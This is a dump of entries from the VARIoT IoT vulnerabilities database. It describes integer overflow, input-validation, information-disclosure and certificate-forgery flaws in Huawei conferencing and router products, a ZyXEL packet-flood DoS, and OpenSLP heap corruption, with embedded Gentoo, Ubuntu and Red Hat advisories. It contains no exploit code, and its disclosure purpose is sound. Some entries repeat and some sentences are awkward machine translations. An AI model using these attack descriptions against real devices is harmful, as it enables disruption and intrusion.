VARIoT IoT vulnerabilities database

Huawei DP300 V500R002C00, RP200 V500R002C00, V600R006C00, TE30 V100R001C10, V500R002C00, V600R006C00, TE40 V500R002C00, V600R006C00, TE50 V500R002C00, V600R006C00, TE60 V100R001C10, V500R002C00, V600R006C00 have an integer overflow vulnerability. Due to insufficient input validation, an authenticated, remote attacker could send malformed SOAP packets to the target device. Successful exploit could cause an integer overflow and might reset a process. plural Huawei The product contains an integer overflow vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei DP300 and other products are all products of China Huawei. The DP300 is a video conferencing terminal. The RP200 is a video conferencing machine. An integer overflow vulnerability exists in several Huawei products due to insufficient implementation of input validation by the program. The following products and versions are affected: Huawei DP300 V500R002C00 Version; RP200 V500R002C00 Version, V600R006C00 Version; TE30 V100R001C10 Version, V500R002C00 Version, V600R006C00 Version; TE40 V500R002C00 Version, V600R006C00 Version; TE50 V500R002C00 Version, V600R006C00 Version; TE60 V100R001C10 Version, V500R002C00 Version, Version V600R006C00

Huawei DP300 V500R002C00, RP200 V500R002C00, V600R006C00, TE30 V100R001C10, V500R002C00, V600R006C00, TE40 V500R002C00, V600R006C00, TE50 V500R002C00, V600R006C00, TE60 V100R001C10, V500R002C00, V600R006C00 have an integer overflow vulnerability. Due to insufficient input validation, an authenticated, remote attacker could send malformed SOAP packets to the target device. Successful exploit could cause an integer overflow and might reset a process. plural Huawei The product contains an integer overflow vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei DP300 and other products are all products of China Huawei. The DP300 is a video conferencing terminal. The RP200 is a video conferencing machine. An integer overflow vulnerability exists in several Huawei products due to insufficient implementation of input validation by the program. The following products and versions are affected: Huawei DP300 V500R002C00 Version; RP200 V500R002C00 Version, V600R006C00 Version; TE30 V100R001C10 Version, V500R002C00 Version, V600R006C00 Version; TE40 V500R002C00 Version, V600R006C00 Version; TE50 V500R002C00 Version, V600R006C00 Version; TE60 V100R001C10 Version, V500R002C00 Version, Version V600R006C00

OpenSLP releases in the 1.0.2 and 1.1.0 code streams have a heap-related memory corruption issue which may manifest itself as a denial-of-service or a remote code-execution vulnerability. OpenSLP Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpenSLP is prone to a heap-memory-corruption vulnerability. An attacker can exploit this issue to crash the affected application or execute arbitrary code within the context of the affected application. OpenSLP 1.0.2 and 1.1.0 are vulnerable. Lenovo ThinkServer RD350G, etc. are all products of China Lenovo (Lenovo). Lenovo ThinkServer RD350G, RD350X, RD450X and HR650 are all rack-mounted servers; N3310 and N4610 are all NAS storage devices; Fan Power Controller (FPC) is a fan speed controller. The protocol supports searching services in the network through service types and attributes. A security vulnerability exists in OpenSLP versions 1.0.2 and 1.1.0. The following products and versions are affected: Lenovo ThinkServer RD350G; ThinkServer RD350X; ThinkServer RD450X; ThinkSystem HR650X; N3310 (Adapted from RD350) prior to 4.53.351; ) Versions prior to 30R-1.13, etc. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202005-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSLP: Multiple vulnerabilities Date: May 14, 2020 Bugs: #662878 ID: 202005-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in OpenSLP, the worst of which could result in the arbitrary execution of code. Background ========== OpenSLP is an open-source implementation of Service Location Protocol (SLP). Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/openslp <= 2.0.0-r5 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Description =========== Multiple vulnerabilities have been discovered in OpenSLP. Please review the CVE identifiers referenced below for details. Impact ====== Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== Gentoo has discontinued support for OpenSLP. We recommend that users unmerge OpenSLP: # emerge --unmerge "net-libs/openslp" NOTE: The Gentoo developer(s) maintaining OpenSLP have discontinued support at this time. It may be possible that a new Gentoo developer will update OpenSLP at a later date. No known alternatives to OpenSLP are in the tree at this time. References ========== [ 1 ] CVE-2017-17833 https://nvd.nist.gov/vuln/detail/CVE-2017-17833 [ 2 ] CVE-2019-5544 https://nvd.nist.gov/vuln/detail/CVE-2019-5544 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202005-12 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-3708-1 July 09, 2018 openslp-dfsg vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 LTS - Ubuntu 14.04 LTS Summary: OpenSLP could be made to crash or run programs if it received specially crafted network traffic. Software Description: - openslp-dfsg: Service Location Protocol library Details: It was discovered that OpenSLP incorrectly handled certain memory operations. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: libslp1 1.2.1-11ubuntu0.16.04.1 Ubuntu 14.04 LTS: libslp1 1.2.1-9ubuntu0.3 In general, a standard system update will make all the necessary changes. 6) - i386, x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Important: openslp security update Advisory ID: RHSA-2018:2240-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:2240 Issue date: 2018-07-23 CVE Names: CVE-2017-17833 ===================================================================== 1. Summary: An update for openslp is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x 3. Description: OpenSLP is an open source implementation of the Service Location Protocol (SLP) which is an Internet Engineering Task Force (IETF) standards track protocol and provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks. Security Fix(es): * openslp: Heap memory corruption in slpd/slpd_process.c allows denial of service or potentially code execution (CVE-2017-17833) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1572166 - CVE-2017-17833 openslp: Heap memory corruption in slpd/slpd_process.c allows denial of service or potentially code execution 6. Package List: Red Hat Enterprise Linux Client (v. 7): Source: openslp-2.0.0-7.el7_5.src.rpm x86_64: openslp-2.0.0-7.el7_5.i686.rpm openslp-2.0.0-7.el7_5.x86_64.rpm openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-server-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-devel-2.0.0-7.el7_5.i686.rpm openslp-devel-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: openslp-2.0.0-7.el7_5.src.rpm x86_64: openslp-2.0.0-7.el7_5.i686.rpm openslp-2.0.0-7.el7_5.x86_64.rpm openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-server-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-devel-2.0.0-7.el7_5.i686.rpm openslp-devel-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: openslp-2.0.0-7.el7_5.src.rpm ppc64: openslp-2.0.0-7.el7_5.ppc.rpm openslp-2.0.0-7.el7_5.ppc64.rpm openslp-debuginfo-2.0.0-7.el7_5.ppc.rpm openslp-debuginfo-2.0.0-7.el7_5.ppc64.rpm openslp-server-2.0.0-7.el7_5.ppc64.rpm ppc64le: openslp-2.0.0-7.el7_5.ppc64le.rpm openslp-debuginfo-2.0.0-7.el7_5.ppc64le.rpm openslp-server-2.0.0-7.el7_5.ppc64le.rpm s390x: openslp-2.0.0-7.el7_5.s390.rpm openslp-2.0.0-7.el7_5.s390x.rpm openslp-debuginfo-2.0.0-7.el7_5.s390.rpm openslp-debuginfo-2.0.0-7.el7_5.s390x.rpm openslp-server-2.0.0-7.el7_5.s390x.rpm x86_64: openslp-2.0.0-7.el7_5.i686.rpm openslp-2.0.0-7.el7_5.x86_64.rpm openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-server-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7): Source: openslp-2.0.0-7.el7_5.src.rpm aarch64: openslp-2.0.0-7.el7_5.aarch64.rpm openslp-debuginfo-2.0.0-7.el7_5.aarch64.rpm openslp-server-2.0.0-7.el7_5.aarch64.rpm ppc64le: openslp-2.0.0-7.el7_5.ppc64le.rpm openslp-debuginfo-2.0.0-7.el7_5.ppc64le.rpm openslp-server-2.0.0-7.el7_5.ppc64le.rpm s390x: openslp-2.0.0-7.el7_5.s390.rpm openslp-2.0.0-7.el7_5.s390x.rpm openslp-debuginfo-2.0.0-7.el7_5.s390.rpm openslp-debuginfo-2.0.0-7.el7_5.s390x.rpm openslp-server-2.0.0-7.el7_5.s390x.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: openslp-debuginfo-2.0.0-7.el7_5.ppc.rpm openslp-debuginfo-2.0.0-7.el7_5.ppc64.rpm openslp-devel-2.0.0-7.el7_5.ppc.rpm openslp-devel-2.0.0-7.el7_5.ppc64.rpm ppc64le: openslp-debuginfo-2.0.0-7.el7_5.ppc64le.rpm openslp-devel-2.0.0-7.el7_5.ppc64le.rpm s390x: openslp-debuginfo-2.0.0-7.el7_5.s390.rpm openslp-debuginfo-2.0.0-7.el7_5.s390x.rpm openslp-devel-2.0.0-7.el7_5.s390.rpm openslp-devel-2.0.0-7.el7_5.s390x.rpm x86_64: openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-devel-2.0.0-7.el7_5.i686.rpm openslp-devel-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7): aarch64: openslp-debuginfo-2.0.0-7.el7_5.aarch64.rpm openslp-devel-2.0.0-7.el7_5.aarch64.rpm ppc64le: openslp-debuginfo-2.0.0-7.el7_5.ppc64le.rpm openslp-devel-2.0.0-7.el7_5.ppc64le.rpm s390x: openslp-debuginfo-2.0.0-7.el7_5.s390.rpm openslp-debuginfo-2.0.0-7.el7_5.s390x.rpm openslp-devel-2.0.0-7.el7_5.s390.rpm openslp-devel-2.0.0-7.el7_5.s390x.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: openslp-2.0.0-7.el7_5.src.rpm x86_64: openslp-2.0.0-7.el7_5.i686.rpm openslp-2.0.0-7.el7_5.x86_64.rpm openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-server-2.0.0-7.el7_5.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: openslp-debuginfo-2.0.0-7.el7_5.i686.rpm openslp-debuginfo-2.0.0-7.el7_5.x86_64.rpm openslp-devel-2.0.0-7.el7_5.i686.rpm openslp-devel-2.0.0-7.el7_5.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2017-17833 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/cve/CVE-2017-17833 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBW1XqMdzjgjWX9erEAQiW3hAAk358/RhcFT2A8KBFIeJ2frbTpp6WbCSY hW72vqKQHa+CxTw7sFU8MG+BllEr3w88eRyGW+E6rtev0FAEAQKvwEzFwZKRsaVx IXcWL+CnhzNkNcnAVO2aG0R3WFX1xvyRJXI6zKhwYl4VuXS8sM6Ynb4++2NQvJUs T6SUHicYKqRNHnw19eFgGSirtGwjB+eBIHZiLS8SfVinIni3ff7X6FaqWOzgI2uu 5Js+urIVqsX1E9wxCF8O2kerpebxyp1ov2D7tKK5FwSHWWke2o36HCQgdKMWkiDO nouSp2nl7YArlX3QLC3QRcAgGTcPuUt3cqZahqA4unGie34TXzyKszxlQxD1O6xT 743zxrCavcVdfHcFYUsa3m1RqqAyjsIdAO06raYpxKYaMK5fo0DBRUS4IS25WEVm /Uum1JGXLnZZnAE4BPQzC4cGav7UMAe2c23FVNFtNfgB8d2D1wWnwOc7N7TIYthr oxB4JC1/suaIo4sC1YqV5C5KqfcMt9wuXl8A7sbQnlAeNalKfSYduUDU4zU3W0Ca tehFsLlnii/0Zrsf4jVNk6OoDAnsrblPBem/lNMP1CwGKLitUmmpnotlnc2O3iX8 XHWlu98rJ+CPnO0/uq8R8O9ONfoS2nmbbRi2KgTPqRNeAO+xYWxIIS91pFYl6Byh GSs8CyxuJUo= =aDcY -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via a flood of IP packets with a TTL of 1. ZyXEL P-660HW The device contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The ZyXELP-660HW is a wireless router from ZyXEL. A denial of service vulnerability exists in ZyXELP-660HWv3. ZyXEL P-660HW is a highly integrated router from ZyXEL Technology Company, which is compatible with existing high-speed ADSL, ADSL2 and ADSL2+ interfaces on copper lines

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. Huawei DP300 Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

Huawei DP300 V500R002C00; V500R002C00B010; V500R002C00B011; V500R002C00B012; V500R002C00B013; V500R002C00B014; V500R002C00B017; V500R002C00B018; V500R002C00SPC100; V500R002C00SPC200; V500R002C00SPC300; V500R002C00SPC400; V500R002C00SPC500; V500R002C00SPC600; V500R002C00SPC800; V500R002C00SPC900; V500R002C00SPCa00; RP200 V500R002C00SPC200; V600R006C00; V600R006C00SPC200; V600R006C00SPC300; TE30 V100R001C10SPC300; V100R001C10SPC500; V100R001C10SPC600; V100R001C10SPC700B010; V500R002C00SPC200; V500R002C00SPC500; V500R002C00SPC600; V500R002C00SPC700; V500R002C00SPC900; V500R002C00SPCb00; V600R006C00; V600R006C00SPC200; V600R006C00SPC300; TE40 V500R002C00SPC600; V500R002C00SPC700; V500R002C00SPC900; V500R002C00SPCb00; V600R006C00; V600R006C00SPC200; V600R006C00SPC300; TE50 V500R002C00SPC600; V500R002C00SPC700; V500R002C00SPCb00; V600R006C00; V600R006C00SPC200; V600R006C00SPC300; TE60 V100R001C10; V100R001C10B001; V100R001C10B002; V100R001C10B010; V100R001C10B011; V100R001C10B012; V100R001C10B013; V100R001C10B014; V100R001C10B016; V100R001C10B017; V100R001C10B018; V100R001C10B019; V100R001C10SPC400; V100R001C10SPC500; V100R001C10SPC600; V100R001C10SPC700; V100R001C10SPC800B011; V100R001C10SPC900; V500R002C00; V500R002C00B010; V500R002C00B011; V500R002C00SPC100; V500R002C00SPC200; V500R002C00SPC300; V500R002C00SPC600; V500R002C00SPC700; V500R002C00SPC800; V500R002C00SPC900; V500R002C00SPCa00; V500R002C00SPCb00; V500R002C00SPCd00; V500R002C00SPCe00; V600R006C00; V600R006C00SPC100; V600R006C00SPC200; V600R006C00SPC300 use the CIDAM protocol, which contains sensitive information in the message when it is implemented. So these products has an information disclosure vulnerability. An authenticated remote attacker could track and get the message of a target system. Successful exploit could allow the attacker to get the information and cause the sensitive information disclosure. Huawei DP300 and other products are all products of China Huawei. The DP300 is a video conferencing terminal. The RP200 is a video conferencing machine. CIDAM is one of the information transmission protocols. The following products and versions are affected: Huawei DP300 V500R002C00 Version, V500R002C00B010 Version, V500R002C00B011 Version, V500R002C00B012 Version, V500R002C00B013 Version, V500R002C00B014 Version, V500R002C00B017 Version, V500R002C00B018 Version, V500R002C00SPC100 Version, V500R002C00SPC200 Version, V500R002C00SPC300 Version, V500R002C00SPC400 Version, V500R002C00SPC500 Version, V500R002C00SPC600 Version, V500R002C00SPC800 Version, V500R002C00SPC900 Version, V500R002C00SPCa00 Version; RP200 V500R002C00SPC200 Version, V600R006C00 Version, V600R006C00SPC200 Version, V600R006C00SPC300 Version; TE30 V100R001C10SPC300 Version, V100R001C10SPC500 Version, V100R001C10SPC600 version, etc.; TE40 V500R002C00SPC600 Version, V500R002C00SPC700 Version, V500R002C00SPC900 version, etc.; TE50 V500R002C00SPC600 Version, V500R002C00SPC700 Version, such as V500R002C00SPCb00; TE60 version V100R001C10, version V100R001C10B001, etc

Huawei AR120-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR1200 V200R005C20, V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR1200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR150 V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR160 V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR200 V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R008C20, AR200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR2200 V200R005C20, V200R005C32, V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, AR2200-S V200R005C32, V200R006C10, V200R007C00, V200R008C20, AR3200 V200R005C32, V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30, AR3600 V200R006C10, V200R007C00, V200R007C01, V200R008C20, AR510 V200R005C32, V200R006C10, V200R007C00, V200R008C20, CloudEngine 12800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 5800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 6800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, CloudEngine 7800 V100R003C00, V100R003C10, V100R005C00, V100R005C10, V100R006C00, V200R001C00, DP300 V500R002C00, SMC2.0 V100R003C10, V100R005C00, V500R002C00, SRG1300 V200R005C32, V200R006C10, V200R007C00, V200R007C02, V200R008C20, SRG2300 V200R005C32, V200R006C10, V200R007C00, V200R007C02, V200R008C20, SRG3300 V200R005C32, V200R006C10, V200R007C00, V200R008C20, TE30 V100R001C10, TE60 V100R003C00, V500R002C00, VP9660 V200R001C02, V200R001C30, V500R002C00, ViewPoint 8660 V100R008C02, V100R008C03, eSpace IAD V300R002C01, eSpace U1981 V200R003C20, V200R003C30, eSpace USM V100R001C01, V300R001C00 have a weak cryptography vulnerability. Due to not properly some values in the certificates, an unauthenticated remote attacker could forges a specific RSA certificate and exploits the vulnerability to pass identity authentication and logs into the target device to obtain permissions configured for the specific user name. plural Huawei The product contains cryptographic vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei AR120-S is a router product of China Huawei. A weak encryption algorithm vulnerability exists in several Huawei products because the program failed to correctly parse the value in the certificate. A remote attacker can exploit this vulnerability to forge an RSA signature with a specially crafted certificate. There are security vulnerabilities in several Huawei products. The following products and versions are affected: Huawei AR120-S V200R005C32 Version, V200R006C10 Version, V200R007C00 Version, V200R008C20 Version; AR1200 V200R005C20 Version, V200R005C32 Version, V200R006C10 Version, V200R007C00 Version, V200R007C01 Version, V200R007C02 Version, V200R008C20 Version; AR1200-S V200R005C32 Version , V200R006C10 version, V200R007C00 version, V200R008C20; AR150, etc

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. plural Huawei The product contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. Huawei DP300 Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

